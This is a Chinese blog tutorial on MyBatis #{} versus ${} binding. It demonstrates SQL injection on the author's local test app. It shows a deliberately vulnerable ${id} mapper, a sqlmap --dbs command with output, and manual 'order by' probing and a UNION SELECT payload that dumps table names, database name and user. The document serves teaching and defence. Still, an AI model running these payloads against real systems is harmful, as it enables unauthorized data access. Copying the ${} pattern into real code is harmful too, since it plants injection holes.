mybatis #{}与${}的区别与sql注入演示

最新推荐文章于 2023-10-17 17:32:59 发布
最新推荐文章于 2023-10-17 17:32:59 发布
阅读量363 收藏 1
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cheng_Kohui/article/details/103751801
版权

mybatis #{}与${}的区别

使用#会对sql进行预编译,sql中参数将使用?占位。参数不参与sql编译,所以无法改变sql执行意图。
select * from user where id = ? paremter=1
使用$参数可以直接参与sql编译,为sql注入提供可趁之机,即
select * from user where id = 1

使用sqlmap进行sql注入

sqlmap是一款开源的sql注入检测工具

安装

git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
vim ~/.zshrc # 添加alias sqlmap='/Users/kevin/Softwares/sqlmap/sqlmap.py'
source ~/.zshrc

测试项目部分代码

  • 控制层
@GetMapping("/test")
@ResponseBody
public ResultBean<UserDTO> findOne(@RequestParam(value = "id") String id){
    return ResultBean.success(userService.findById(id));
}
  • userMapper.xml - 使用不安全的$
<select id="findById" resultMap="BaseResultMap" parameterType="String">
    select * from user_center.user
    <where>
        id = ${id}
    </where>
</select>

执行sqlmap命令

  • 获取mysql数据库名
sqlmap git:(master) sqlmap -u "http://localhost:8888/user/test?id=1" --dbs

...

[10:03:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[10:03:01] [INFO] fetching database names
[10:03:01] [INFO] used SQL query returns 10 entries
[10:03:01] [INFO] retrieved: 'mysql'
[10:03:01] [INFO] retrieved: 'information_schema'
[10:03:01] [INFO] retrieved: 'performance_schema'
[10:03:01] [INFO] retrieved: 'sys'
[10:03:01] [INFO] retrieved: 'user_center'
available databases [5]:                                                                                                                            
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] user_center

上面是通过工具进行sql注入,以下演示手工如何进行sql注入

1. 利用order by 判断字段数
如先假设表总有9个字段,令其按照第9个字段排序。访问http://localhost:8888/user/test?id=1 order by 9。此时如果出现500异常,则该表字段树少于9。此时后台的异常为

2019-12-30 20:35:26.853  WARN 46496 --- [nio-8888-exec-6] .m.m.a.ExceptionHandlerExceptionResolver : Resolved [org.springframework.jdbc.BadSqlGrammarException: 
### Error querying database.  Cause: java.sql.SQLSyntaxErrorException: Unknown column '9' in 'order clause'
### The error may exist in com/study/exceptionhandle/dao/user/UserMapper.xml
### The error may involve com.study.exceptionhandle.dao.user.UserMapper.findById-Inline
### The error occurred while setting parameters
### SQL: select * from user_center.user      WHERE id = 1 order by 9
### Cause: java.sql.SQLSyntaxErrorException: Unknown column '9' in 'order clause'
; bad SQL grammar []; nested exception is java.sql.SQLSyntaxErrorException: Unknown column '9' in 'order clause']

不断试探,最后发现按照第8个字段排序不会报错,即访问http://localhost:8888/user/test?id=1 order by 8返回正确响应。

{
	code: 0,
	message: "Success",
	data: {
		id: 1,
		wxId: "xxxx",
		wxNickname: "King",
		roles: "admin",
		avatarUrl: "a.jpg",
		createTime: "2019-12-11T16:37:22.000+0000",
		updateTime: "2019-12-11T16:37:22.000+0000",
		bonus: 50
	}
}

利用union select联合查询,获取表名、数据库名和用户名
访问
http://localhost:8888/user/test?id=1111111 union select 1,2,group_concat(table_name),database(),user(),'2019-12-11 16:37:22','2019-12-11 16:37:22',8 from information_schema.tables where table_schema=database()

{
	code: 0,
	message: "Success",
	data: {
		id: 1,
		wxId: "2",
		wxNickname: "bonus_event_log,user",
		roles: "user_center",
		avatarUrl: "root@192.168.65.3",
		createTime: "2019-12-11T16:37:22.000+0000",
		updateTime: "2019-12-11T16:37:22.000+0000",
		bonus: 8
	}
}

可知当前数据库名为user_center,当前数据库用户为root@192.168.65.3

更多sql注入知识参考:
sqli-labs

Kevin_K_H_ZHENG
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mybatis防止sql注入的实例
08-30
本文通过实例给大家介绍了Mybatis防止sql注入的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
SpringBoot集成Mybatis实现简单的SQL注入(攻击)案例
12-14
(1)主演示就是一张t_user表,利用常见的用户登录来模拟sql注入对后台数据的侵入 (2)数据库脚本 — postgresql DROP TABLE IF EXISTS "public"."t_user"; CREATE TABLE "public"."t_user" ( "id" int8 NOT ...
Mybatis sql注入
wwhhff11
06-12 754
sql注入大家都不陌生,是一种常见的攻击方式,攻击者在界面的表单信息或url上输入一些奇怪的sql片段,例如“or ‘1’=’1’”这样的语句,有可能入侵参数校验不足的应用程序。所以在我们的应用中需要做一些工作,来防备这样的攻击方式。在一些安全性很高的应用中,比如银行软件,经常使用将sql语句全部替换为存储过程这样的方式,来防止sql注入,这当然是一种很安全的方式,但我们平时开发中,可能不需要这种死
Mybatis-入门演示
weixin_44304387的博客
05-12 125
MyBatis:持久层框架 前言 之前有看过和学习一些mybatis的文章和内容,但是没有去写过文章记录下,现在借鉴b站的狂神视频和官方文档看来重新撸一遍入门。有错误请多指教。 内容 数据访问层-相当于之前web项目中dao层,数据库的交互,包括增删改查; 持久化就是将数据在持久状态和瞬时状态转化的过程。内存是断电即失。所以需要数据的持久化。 JDBC技术:Connection、Prep...
mybatis中"#"和"$"的区别
weixin_34245749的博客
04-23 127
动态 sqlmybatis 的主要特性之一,在 mapper 中定义的参数传到 xml 中之后,在查询之前 mybatis 会对其进行动态解析。mybatis 为我们提供了两种支持动态 sql 的语法:#{} 以及 ${}。 mybatis本身的说明: String Substitution By default, using the #{} syntax will cause...
myBatisSQL注入问题
lihaiming_2008的专栏
10-30 129
sqlMap中尽量不要使用$;$使用的是Statement(拼接字符串),会出现注入问题。#使用的是PreparedStatement(类似于预编译),将转义交给了数据库,不会出现注入问题;.前者容易出现SQL注入之类的安全问题,所以ibatis推荐使用#。 1、  正确使用$示例:ORDER BY $sortFieldName$ $sortType$,当参数是数据库字段名时这样使用是合适...
MyBatis直接执行SQL的工具SqlMapper
08-26
"MyBatis直接执行SQL的工具SqlMapper" MyBatis是一个流行的持久层框架,它提供了一个灵活的方式来交互数据库。然而,在某些情况下,我们可能需要直接执行SQL语句来实现某些复杂的数据库操作。这时,MyBatis提供了一...
SQL注入漏洞演示源代码
12-17
- **使用ORM框架**:例如Hibernate、MyBatis等,它们在一定程度上能自动处理SQL注入问题。 4. **源代码分析**: 包含的`README.md`可能是项目说明,提供了关于如何运行和理解示例代码的信息。而`SQL注入漏洞实例...
spring4-mybatis:Spring4 与 Mybatis 演示
07-14
"spring4-mybatis"项目是一个演示了如何将Spring4与MyBatis集成的实例,它展示了这两个库在实际项目中的协同工作方式。 Spring4是Spring框架的第四个主要版本,提供了许多增强的功能和性能优化。Spring框架的核心...
有效防止sql注入的方法演示
09-08
3. **使用ORM框架的安全特性**:如Hibernate、MyBatis等,它们通常有内置的SQL注入防护机制。 4. **限制数据库权限**:确保应用程序使用的数据库账户只有执行所需操作的最小权限,降低潜在损害。 5. **错误处理**...
java持久层框架mybatis防止sql注入的方法
09-01
下面小编就为大家带来一篇java持久层框架mybatis防止sql注入的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
sqlmap常用语句
08-14
sqlmap常用语句sqlmap常用语句
mybatis_demo:Mybatis演示
05-03
Mybatis支持多种参数绑定方式,如#{}和${},其中#{}用于预编译防止SQL注入${}则直接替换字符串。结果映射可以通过自动类型转换,或者自定义ResultMap来实现复杂对象的映射。 9. **Mybatis的缓存机制**: ...
MyBatis:MyBatis演示
05-19
10. **MyBatis与Spring整合**:在实际开发中,MyBatis通常与Spring框架结合使用,通过Spring的DataSourceTransactionManager管理事务,使用Spring的@Autowired自动注入Mapper接口,简化了事务管理和对象装配。...
MyBatis:myBatis测试演示
04-29
接口方法名与XML文件中的id对应,这样MyBatis可以通过接口调用XML中的SQL。 4. **实体类(POJOs)**:创建与数据库表对应的Java类,这些类将作为数据传输对象。每个字段对应数据库表的列。 5. **Service层**:创建...
Mybatis中的$#区别
在下荆山的博客
01-12 257
在Ibatis中我们使用SqlMap进行Sql查询时需要引用参数,在参数引用中遇到的符号 #$ 之间的区分为,#可以进行预编译,进行类型匹配,而 $ 不进行数据类型匹配,例如: select * from table where id = #id# ,其中如果字段id为字符型,那么#id#表示的就是'id'类型,如果id为整型,那么#id#就是id型。 select * from table where id = $id$ ,如果字段id为整型,Sql语句就不会出错,但是如果字段id为字符型,那么S.
ibatis #$区别
落叶翩翩的CSDN博客
12-07 806
#$区别: 1.#是把传入的数据当作字符串,如果 order by #field# ,如#field#传入的是id,则sql语句生成是这样,order by "id",这当然会报错.. 2.$传入的数据直接生成在sql里,如果 order by $field$ ,如$field$ 传入的是id,则sql语句生成是这样,order by id, 这就对了. 3.$方式一般用于传入数据库对
mybatis-plus 3.4.2版本注解@TableName中动态schema实现
最新发布
xie_apple的博客
10-17 3326
因为该版本的表名生成拦截器不符合我们动态表空间动态替换,去获取.properties里配置的属性值。而注解@TableName里有属性schema,可以设置表空间,但是因为是写死,不够灵活,当测试环境和生产环境的表空间不一致,而对应的表结构一致,或者表空间修改时,那么就需要改动大批量的实体类代码,后期维护太过繁琐,增加工作量。项目数据库test_db和app_db使用同一个mysql实例,分不同的库(表模型),为了降低复杂度,给db_data_link的用户赋予了db_ds数据库的只读权限,可以跨库查询。
MyBatis与spring的整合-添加事务-src.zip
10-20
"MyBatis与Spring的整合-添加事务"的项目可能包含了一个示例,演示了如何在Spring环境中配置MyBatis并实现事务管理。通过这种方式,开发者可以利用MyBatis的简单易用和Spring的强大功能,构建高效且易于维护的Java...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值